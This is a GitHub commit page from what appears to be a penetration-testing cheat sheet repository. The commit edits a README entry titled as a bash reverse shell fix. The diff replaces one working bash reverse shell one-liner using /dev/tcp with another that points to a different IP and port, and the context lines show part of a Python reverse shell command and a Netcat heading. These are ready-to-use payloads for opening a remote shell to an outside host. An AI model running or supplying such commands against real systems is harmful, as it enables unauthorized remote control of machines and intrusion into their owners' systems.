Skip to content

Commit e92bfbf

Browse files
author
İsmail Taşdelen
authored
Merge pull request security-cheatsheet#3 from ismailtasdelen/ismailtasdelen-patch-2-1
bash reverse shell command error fix
2 parents 8d9b5b2 + 5eb104c commit e92bfbf

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -25,7 +25,7 @@ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOC
2525
#### Bash :
2626

2727
```
28-
bash -i >& /dev/tcp/192.168.0.5/4444 0>&1
28+
bash -i >& /dev/tcp/192.168.0.1/8080 0>&1
2929
```
3030

3131
#### Netcat :

0 commit comments

Comments
 (0)